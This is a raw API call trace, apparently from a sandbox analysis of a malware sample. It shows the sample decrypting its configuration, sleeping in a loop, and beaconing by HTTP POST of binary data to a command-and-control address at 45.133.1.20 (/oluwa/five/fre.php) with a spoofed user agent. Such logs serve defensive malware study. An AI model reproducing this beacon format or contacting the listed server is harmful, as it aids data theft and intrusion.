[0234.982] GetProcessHeap () returned 0x6a0000 [0234.983] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4a30 | out: hHeap=0x6a0000) returned 1 [0234.983] GetProcessHeap () returned 0x6a0000 [0234.983] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3670 | out: hHeap=0x6a0000) returned 1 [0234.984] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6d8f10, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x147c) returned 0x748 [0234.986] Sleep (dwMilliseconds=0xea60) [0234.987] GetProcessHeap () returned 0x6a0000 [0234.987] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4be0 [0234.988] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0234.989] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0234.995] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0234.996] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6beca0) returned 1 [0235.015] GetProcessHeap () returned 0x6a0000 [0235.015] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0c10 [0235.016] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0235.017] CryptImportKey (in: hProv=0x6beca0, pbData=0x6b0c10, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad4e0) returned 1 [0235.018] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0235.019] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0235.020] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0235.021] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0235.021] GetProcessHeap () returned 0x6a0000 [0235.021] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0c10 | out: hHeap=0x6a0000) returned 1 [0235.023] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0235.024] CryptDecrypt (in: hKey=0x6ad4e0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4be0, pdwDataLen=0x19fcfc | out: pbData=0x6b4be0, pdwDataLen=0x19fcfc) returned 1 [0235.025] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0235.026] CryptDestroyKey (hKey=0x6ad4e0) returned 1 [0235.028] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0235.028] CryptReleaseContext (hProv=0x6beca0, dwFlags=0x0) returned 1 [0235.029] GetProcessHeap () returned 0x6a0000 [0235.029] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0235.031] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0235.031] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0235.032] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0235.032] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0235.033] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0235.033] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0235.034] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0235.034] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0235.034] GetProcessHeap () returned 0x6a0000 [0235.034] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3800 [0235.034] getaddrinfo (in: pNodeName="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0235.034] GetProcessHeap () returned 0x6a0000 [0235.035] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3800 | out: hHeap=0x6a0000) returned 1 [0235.035] GetProcessHeap () returned 0x6a0000 [0235.035] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0235.035] GetProcessHeap () returned 0x6a0000 [0235.035] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4be0 | out: hHeap=0x6a0000) returned 1 [0235.035] GetProcessHeap () returned 0x6a0000 [0235.035] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4910 [0235.036] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0235.036] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0235.042] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0235.042] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6bef48) returned 1 [0235.048] GetProcessHeap () returned 0x6a0000 [0235.048] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0c10 [0235.049] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0235.049] CryptImportKey (in: hProv=0x6bef48, pbData=0x6b0c10, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad4e0) returned 1 [0235.050] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0235.050] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0235.051] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0235.051] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0235.051] GetProcessHeap () returned 0x6a0000 [0235.052] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0c10 | out: hHeap=0x6a0000) returned 1 [0235.053] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0235.053] CryptDecrypt (in: hKey=0x6ad4e0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4910, pdwDataLen=0x19fcfc | out: pbData=0x6b4910, pdwDataLen=0x19fcfc) returned 1 [0235.053] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0235.054] CryptDestroyKey (hKey=0x6ad4e0) returned 1 [0235.054] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0235.055] CryptReleaseContext (hProv=0x6bef48, dwFlags=0x0) returned 1 [0235.055] GetProcessHeap () returned 0x6a0000 [0235.055] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0235.055] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0235.056] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="http://") returned 0x0 [0235.057] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0235.057] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="https://") returned 0x0 [0235.057] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0235.058] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="/") returned="/oluwa/five/fre.php" [0235.058] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0235.059] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch=":") returned 0x0 [0235.059] GetProcessHeap () returned 0x6a0000 [0235.059] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3670 [0235.059] getaddrinfo (in: pNodeName="45.133.1.20", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6b3490*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6beb08*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) returned 0 [0235.059] GetProcessHeap () returned 0x6a0000 [0235.059] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x6bab40 [0235.059] socket (af=2, type=1, protocol=6) returned 0x74c [0235.059] connect (s=0x74c, name=0x6beb08*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), namelen=16) returned 0 [0235.094] FreeAddrInfoW (pAddrInfo=0x6b3490*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6beb08*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) [0235.094] GetProcessHeap () returned 0x6a0000 [0235.094] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x7d) returned 0x6bef48 [0235.094] GetProcessHeap () returned 0x6a0000 [0235.094] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x201b) returned 0x6da6f0 [0235.095] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0235.096] wvsprintfA (in: param_1=0x6da6f0, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0235.096] GetProcessHeap () returned 0x6a0000 [0235.096] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xb3) returned 0x6b9ff0 [0235.096] GetProcessHeap () returned 0x6a0000 [0235.097] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6da6f0 | out: hHeap=0x6a0000) returned 1 [0235.097] GetProcessHeap () returned 0x6a0000 [0235.097] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x3e) returned 0x6b4a30 [0235.097] GetProcessHeap () returned 0x6a0000 [0235.097] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1fdc) returned 0x6da6f0 [0235.097] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0235.098] wvsprintfA (in: param_1=0x6da6f0, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 2D36A626\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0235.098] GetProcessHeap () returned 0x6a0000 [0235.098] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xf4) returned 0x6bd460 [0235.098] GetProcessHeap () returned 0x6a0000 [0235.099] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6da6f0 | out: hHeap=0x6a0000) returned 1 [0235.099] send (s=0x74c, buf=0x6bd460*, len=242, flags=0) returned 242 [0235.099] send (s=0x74c, buf=0x6bb998*, len=159, flags=0) returned 159 [0235.099] GetProcessHeap () returned 0x6a0000 [0235.099] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xfd0) returned 0x6d8f10 [0235.100] recv (in: s=0x74c, buf=0x6d8f10, len=4048, flags=0 | out: buf=0x6d8f10*) returned 204 [0235.185] GetProcessHeap () returned 0x6a0000 [0235.186] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bd460 | out: hHeap=0x6a0000) returned 1 [0235.187] GetProcessHeap () returned 0x6a0000 [0235.187] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4a30 | out: hHeap=0x6a0000) returned 1 [0235.187] GetProcessHeap () returned 0x6a0000 [0235.187] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b9ff0 | out: hHeap=0x6a0000) returned 1 [0235.187] GetProcessHeap () returned 0x6a0000 [0235.188] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bef48 | out: hHeap=0x6a0000) returned 1 [0235.188] closesocket (s=0x74c) returned 0 [0235.188] GetProcessHeap () returned 0x6a0000 [0235.188] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bab40 | out: hHeap=0x6a0000) returned 1 [0235.189] GetProcessHeap () returned 0x6a0000 [0235.189] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0235.189] GetProcessHeap () returned 0x6a0000 [0235.189] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4910 | out: hHeap=0x6a0000) returned 1 [0235.189] GetProcessHeap () returned 0x6a0000 [0235.190] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3670 | out: hHeap=0x6a0000) returned 1 [0235.190] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6d8f10, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x1480) returned 0x74c [0235.192] Sleep (dwMilliseconds=0xea60) [0235.194] GetProcessHeap () returned 0x6a0000 [0235.194] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4d48 [0235.194] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0235.195] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0235.209] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0235.209] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6bef48) returned 1 [0235.219] GetProcessHeap () returned 0x6a0000 [0235.219] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6da008 [0235.220] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0235.220] CryptImportKey (in: hProv=0x6bef48, pbData=0x6da008, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad560) returned 1 [0235.221] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0235.221] CryptSetKeyParam (hKey=0x6ad560, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0235.222] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0235.222] CryptSetKeyParam (hKey=0x6ad560, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0235.222] GetProcessHeap () returned 0x6a0000 [0235.223] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6da008 | out: hHeap=0x6a0000) returned 1 [0235.224] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0235.227] CryptDecrypt (in: hKey=0x6ad560, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4d48, pdwDataLen=0x19fcfc | out: pbData=0x6b4d48, pdwDataLen=0x19fcfc) returned 1 [0235.239] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0235.239] CryptDestroyKey (hKey=0x6ad560) returned 1 [0235.240] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0235.241] CryptReleaseContext (hProv=0x6bef48, dwFlags=0x0) returned 1 [0235.241] GetProcessHeap () returned 0x6a0000 [0235.241] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0235.242] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0235.242] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0235.243] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0235.244] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0235.244] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0235.245] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0235.246] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0235.246] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0235.246] GetProcessHeap () returned 0x6a0000 [0235.246] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3670 [0235.246] getaddrinfo (in: pNodeName="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0235.249] GetProcessHeap () returned 0x6a0000 [0235.250] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3670 | out: hHeap=0x6a0000) returned 1 [0235.250] GetProcessHeap () returned 0x6a0000 [0235.250] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0235.250] GetProcessHeap () returned 0x6a0000 [0235.251] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4d48 | out: hHeap=0x6a0000) returned 1 [0235.251] GetProcessHeap () returned 0x6a0000 [0235.251] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4910 [0235.252] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0235.252] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0235.261] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0235.262] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6bf058) returned 1 [0235.273] GetProcessHeap () returned 0x6a0000 [0235.273] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0af0 [0235.274] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0235.275] CryptImportKey (in: hProv=0x6bf058, pbData=0x6b0af0, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad060) returned 1 [0235.276] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0235.276] CryptSetKeyParam (hKey=0x6ad060, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0235.277] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0235.277] CryptSetKeyParam (hKey=0x6ad060, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0235.277] GetProcessHeap () returned 0x6a0000 [0235.278] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0af0 | out: hHeap=0x6a0000) returned 1 [0235.279] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0235.279] CryptDecrypt (in: hKey=0x6ad060, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4910, pdwDataLen=0x19fcfc | out: pbData=0x6b4910, pdwDataLen=0x19fcfc) returned 1 [0235.280] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0235.281] CryptDestroyKey (hKey=0x6ad060) returned 1 [0235.282] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0235.282] CryptReleaseContext (hProv=0x6bf058, dwFlags=0x0) returned 1 [0235.282] GetProcessHeap () returned 0x6a0000 [0235.282] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0235.283] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0235.283] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="http://") returned 0x0 [0235.284] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0235.285] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="https://") returned 0x0 [0235.286] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0235.286] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="/") returned="/oluwa/five/fre.php" [0235.287] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0235.287] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch=":") returned 0x0 [0235.287] GetProcessHeap () returned 0x6a0000 [0235.287] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3800 [0235.287] getaddrinfo (in: pNodeName="45.133.1.20", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6b3670*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6beb08*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) returned 0 [0235.287] GetProcessHeap () returned 0x6a0000 [0235.287] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x6ba9a0 [0235.287] socket (af=2, type=1, protocol=6) returned 0x750 [0235.288] connect (s=0x750, name=0x6beb08*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), namelen=16) returned 0 [0235.309] FreeAddrInfoW (pAddrInfo=0x6b3670*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6beb08*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) [0235.309] GetProcessHeap () returned 0x6a0000 [0235.309] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x7d) returned 0x6bf058 [0235.309] GetProcessHeap () returned 0x6a0000 [0235.309] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x201b) returned 0x6da6f0 [0235.310] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0235.311] wvsprintfA (in: param_1=0x6da6f0, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0235.311] GetProcessHeap () returned 0x6a0000 [0235.311] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xb3) returned 0x6b9c30 [0235.311] GetProcessHeap () returned 0x6a0000 [0235.312] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6da6f0 | out: hHeap=0x6a0000) returned 1 [0235.312] GetProcessHeap () returned 0x6a0000 [0235.312] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x3e) returned 0x6b49a0 [0235.312] GetProcessHeap () returned 0x6a0000 [0235.312] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1fdc) returned 0x6da6f0 [0235.312] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0235.313] wvsprintfA (in: param_1=0x6da6f0, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 2D36A626\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0235.313] GetProcessHeap () returned 0x6a0000 [0235.313] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xf4) returned 0x6bd460 [0235.313] GetProcessHeap () returned 0x6a0000 [0235.314] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6da6f0 | out: hHeap=0x6a0000) returned 1 [0235.316] send (s=0x750, buf=0x6bd460*, len=242, flags=0) returned 242 [0235.317] send (s=0x750, buf=0x6bb998*, len=159, flags=0) returned 159 [0235.317] GetProcessHeap () returned 0x6a0000 [0235.317] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xfd0) returned 0x6d8f10 [0235.317] recv (in: s=0x750, buf=0x6d8f10, len=4048, flags=0 | out: buf=0x6d8f10*) returned 204 [0235.388] GetProcessHeap () returned 0x6a0000 [0235.388] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bd460 | out: hHeap=0x6a0000) returned 1 [0235.388] GetProcessHeap () returned 0x6a0000 [0235.388] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b49a0 | out: hHeap=0x6a0000) returned 1 [0235.389] GetProcessHeap () returned 0x6a0000 [0235.389] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b9c30 | out: hHeap=0x6a0000) returned 1 [0235.389] GetProcessHeap () returned 0x6a0000 [0235.389] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bf058 | out: hHeap=0x6a0000) returned 1 [0235.389] closesocket (s=0x750) returned 0 [0235.391] GetProcessHeap () returned 0x6a0000 [0235.391] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6ba9a0 | out: hHeap=0x6a0000) returned 1 [0235.391] GetProcessHeap () returned 0x6a0000 [0235.391] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0235.391] GetProcessHeap () returned 0x6a0000 [0235.392] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4910 | out: hHeap=0x6a0000) returned 1 [0235.392] GetProcessHeap () returned 0x6a0000 [0235.392] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3800 | out: hHeap=0x6a0000) returned 1 [0235.393] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6d8f10, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x1484) returned 0x750 [0235.395] Sleep (dwMilliseconds=0xea60) [0235.397] GetProcessHeap () returned 0x6a0000 [0235.397] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4a30 [0235.398] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0235.398] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, 